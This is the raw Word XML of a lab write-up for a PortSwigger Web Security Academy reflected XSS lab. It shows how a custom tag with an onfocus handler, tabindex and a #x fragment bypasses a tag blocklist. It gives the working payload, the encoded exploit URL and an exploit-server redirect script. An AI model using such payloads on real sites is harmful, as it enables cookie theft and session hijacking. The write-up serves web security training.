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"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB WRITEUP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Reflected XSS into HTML Context with All Tags Blocked Except Custom Ones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="480" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy  |  Practitioner Level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Difficulty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Practitioner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Category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Cross-Site Scripting (XSS)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Technique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Custom Tag Injection + onfocus Event Handler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Goal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Automatically alert(document.cookie) on victim page load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1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Many applications implement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">blocklists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to filter dangerous HTML tags such as </w:t>
      </w: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&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr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&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w: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&lt;svg&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, if the filter only targets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">known standard HTML tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ignores custom/non-standard element names, an attacker can define their own tags and attach JavaScript event handlers to execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The search functionality reflects user input directly into the HTML response body. The server-side filter blocks all standard HTML tags but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">permits custom tag names</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w: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&lt;puku&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w: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&lt;xss&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These custom tags can carry event handler attributes like </w:t>
      </w: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onfocus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that execute JavaScript when triggered by browser behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Steps</w:t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Step 1 — Craft the Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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&lt;puku id=x onfocus=alert(document.cookie) tabindex=0&gt;text&lt;/puku&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload breakdown: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Part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&lt;puku&gt;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Custom (non-standard) tag — bypasses the standard tag blocklist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id=x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Assigns ID so it can be targeted via the URL fragment #x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onfocus=alert(document.cookie)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Event handler that fires when element receives focus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tabindex=0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Makes the element focusable by the browser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Step 2 — Build the Exploit URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The payload is URL-encoded and placed in the search parameter. The #x fragment at the end instructs the browser to auto-focus the element with id=x on page load, automatically triggering the onfocus handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit URL structure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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https://YOUR-LAB-ID.web-security-academy.net/?search=&lt;puku+id=x+onfocus=alert(document.cookie)+tabindex=0&gt;#x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encoded version:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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?search=%3Cpuku+id%3Dx+onfocus%3Dalert%28document.cookie%29+tabindex%3D0%3E#x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w: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Step 3 — Deliver via Exploit Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Paste the following script into the exploit server, replacing YOUR-LAB-ID with the actual lab ID:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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%3Cpuku+id%3Dx+onfocus%3Dalert%28document.cookie%29+tabindex%3D0%3E#x';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Then click Store and Deliver exploit to victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works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The victim's browser loads the exploit URL via the redirect script.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The custom tag </w:t>
      </w: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&lt;puku id=x onfocus=alert(document.cookie) tabindex=0&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is reflected into the HTML page body.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The </w:t>
      </w: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#x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL fragment causes the browser to scroll to and automatically </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the element with id="x".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The </w:t>
      </w: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onfocus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> event fires automatically, executing </w:t>
      </w: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alert(document.cookie)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any user interaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="F0AD4E" w:sz="12" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="160" w:before="160"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocklists that only cover known/standard HTML tags are bypassed by custom tag names. Proper XSS mitigation requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">allowlisting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (only permit explicitly safe markup) rather than blocklisting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Tags: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS  •  Reflected XSS  •  Custom HTML Tags  •  onfocus  •  tabindex  •  Event Handler Injection  •  Blocklist Bypass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A3C5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2026-04-27T13:30:58.017Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-27T13:30:58.019Z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